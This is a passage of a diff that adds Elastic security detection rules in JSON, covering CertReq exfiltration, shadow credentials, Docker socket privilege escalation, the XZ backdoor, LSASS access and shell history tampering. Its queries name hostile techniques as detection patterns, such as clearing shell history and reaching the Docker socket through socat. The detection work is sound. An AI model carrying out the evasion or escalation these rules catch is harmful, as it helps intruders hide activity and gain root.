(MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"CertReq.exe\" or ?process.pe.original_file_name == \"CertReq.exe\") and process.args : \"-Post\"\n", + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_108.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_108.json new file mode 100644 index 00000000000..e79970cd0f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_108.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify the modification of the msDS-KeyCredentialLink attribute in an Active Directory Computer or User Object. Attackers can abuse control over the object and create a key pair, append to raw public key in the attribute, and obtain persistent and stealthy access to the target user or computer object.", + "false_positives": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Shadow Credentials added to AD Object", + "note": "## Triage and analysis\n\n### Investigating Potential Shadow Credentials added to AD Object\n\nThe msDS-KeyCredentialLink is an Active Directory (AD) attribute that links cryptographic certificates to a user or computer for domain authentication.\n\nAttackers with write privileges on this attribute over an object can abuse it to gain access to the object or maintain persistence. This means they can authenticate and perform actions on behalf of the exploited identity, and they can use Shadow Credentials to request Ticket Granting Tickets (TGTs) on behalf of the identity.\n\n#### Possible investigation steps\n\n- Identify whether Windows Hello for Business (WHfB) and/or Azure AD is used in the environment.\n - Review the event ID 4624 for logon events involving the subject identity (`winlog.event_data.SubjectUserName`).\n - Check whether the `source.ip` is the server running Azure AD Connect.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review the event IDs 4768 and 4769 for suspicious ticket requests involving the modified identity (`winlog.event_data.ObjectDN`).\n - Extract the source IP addresses from these events and use them as indicators of compromise (IoCs) to investigate whether the host is compromised and to scope the attacker's access to the environment.\n\n### False positive analysis\n\n- Administrators might use custom accounts on Azure AD Connect. If this is the case, make sure the account is properly secured. You can also create an exception for the account if expected activity makes too much noise in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Remove the Shadow Credentials from the object.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:\"Directory Service Changes\" and event.code:\"5136\" and\n winlog.event_data.AttributeLDAPDisplayName:\"msDS-KeyCredentialLink\" and winlog.event_data.AttributeValue :B\\:828* and\n not winlog.event_data.SubjectUserName: MSOL_*\n", + "references": [ + "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", + "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials", + "https://github.com/OTRF/Set-AuditRule", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5.json new file mode 100644 index 00000000000..0d8234c9b50 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation through Writable Docker Socket", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n(\n (process.name == \"docker\" and process.args : \"run\" and process.args : \"-it\" and \n process.args : (\"unix://*/docker.sock\", \"unix://*/dockershim.sock\")) or \n (process.name == \"socat\" and process.args : (\"UNIX-CONNECT:*/docker.sock\", \"UNIX-CONNECT:*/dockershim.sock\"))\n) and not user.Ext.real.id : \"0\" and not group.Ext.real.id : \"0\"\n", + "references": [ + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#automatic-enumeration-and-escape" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "7acb2de3-8465-472a-8d9c-ccd7b73d0ed8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Domain: Container", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_1.json b/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_1.json new file mode 100644 index 00000000000..bbf9ca39902 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_1.json @@ -0,0 +1,181 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "It identifies potential malicious shell executions through remote SSH and detects cases where the sshd service suddenly terminates soon after successful execution, suggesting suspicious behavior similar to the XZ backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Execution via XZBackdoor", + "query": "sequence by host.id, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"sshd\" and\n process.args == \"-D\" and process.args == \"-R\"] by process.pid, process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.parent.name == \"sshd\" and \n process.executable != \"/usr/sbin/sshd\"] by process.parent.pid, process.parent.entity_id\n [process where host.os.type == \"linux\" and event.action == \"end\" and process.name == \"sshd\" and process.exit_code != 0] by process.pid, process.entity_id\n [network where host.os.type == \"linux\" and event.type == \"end\" and event.action == \"disconnect_received\" and process.name == \"sshd\"] by process.pid, process.entity_id\n", + "references": [ + "https://github.com/amlweems/xzbot", + "https://access.redhat.com/security/cve/CVE-2024-3094" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.exit_code", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7afc6cc9-8800-4c7f-be6b-b688d2dea248", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + }, + { + "id": "T1563", + "name": "Remote Service Session Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "7afc6cc9-8800-4c7f-be6b-b688d2dea248_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_110.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_110.json new file mode 100644 index 00000000000..0b4fe68b2ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_110.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Network Enumeration", + "note": "## Triage and analysis\n\n### Investigating Windows Network Enumeration\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `net` utility to enumerate servers in the environment that hosts shared drives or printers. This information is useful to attackers as they can identify targets for lateral movements and search for valuable shared data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n (process.args : \"view\" or (process.args : \"time\" and process.args : \"\\\\\\\\*\"))\n\n\n /* expand when ancestry is available\n and not descendant of [process where event.type == \"start\" and process.name : \"cmd.exe\" and\n ((process.parent.name : \"userinit.exe\") or\n (process.parent.name : \"gpscript.exe\") or\n (process.parent.name : \"explorer.exe\" and\n process.args : \"C:\\\\*\\\\Start Menu\\\\Programs\\\\Startup\\\\*.bat*\"))]\n */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "7b8bfc26-81d2-435e-965c-d722ee397ef1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_208.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_208.json new file mode 100644 index 00000000000..4e108b5c7c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_208.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to LSASS handle from a call trace pointing to seclogon.dll and with a suspicious access rights value. This may indicate an attempt to leak an LSASS handle via abusing the Secondary Logon service in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious LSASS Access via MalSecLogon", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "references": [ + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 208 + }, + "id": "7ba58110-ae13-439b-8192-357b0fcfa9d7_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105.json new file mode 100644 index 00000000000..386767b2b89 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Tampering of Shell Command-Line History", + "query": "process where event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and event.type == \"start\" and\n (\n ((process.args : (\"rm\", \"echo\") or\n (process.args : \"ln\" and process.args : \"-sf\" and process.args : \"/dev/null\") or\n (process.args : \"truncate\" and process.args : \"-s0\"))\n and process.args : (\".bash_history\", \"/root/.bash_history\", \"/home/*/.bash_history\",\"/Users/.bash_history\", \"/Users/*/.bash_history\",\n \".zsh_history\", \"/root/.zsh_history\", \"/home/*/.zsh_history\", \"/Users/.zsh_history\", \"/Users/*/.zsh_history\")) or\n (process.name : \"history\" and process.args : \"-c\") or\n (process.args : \"export\" and process.args : (\"HISTFILE=/dev/null\", \"HISTFILESIZE=0\")) or\n (process.args : \"unset\" and process.args : \"HISTFILE\") or\n (process.args : \"set\" and process.args : \"history\" and process.args : \"+o\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.003", + "name": "Clear Command History", + "reference": "https://attack.mitre.org/techniques/T1070/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2.json b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2.json new file mode 100644 index 00000000000..06b3f2d83f2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the elevation of regular user permissions to root permissions through the kworker process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process, and hijack the execution flow by hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Kworker UID Elevation", + "query": "process where host.os.type == \"linux\" and event.action == \"session_id_change\" and process.name : \"kworker*\" and\nuser.id == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed 